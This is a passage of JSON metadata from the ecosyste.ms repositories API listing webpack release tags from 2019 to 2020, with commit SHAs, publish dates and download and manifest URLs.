ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.e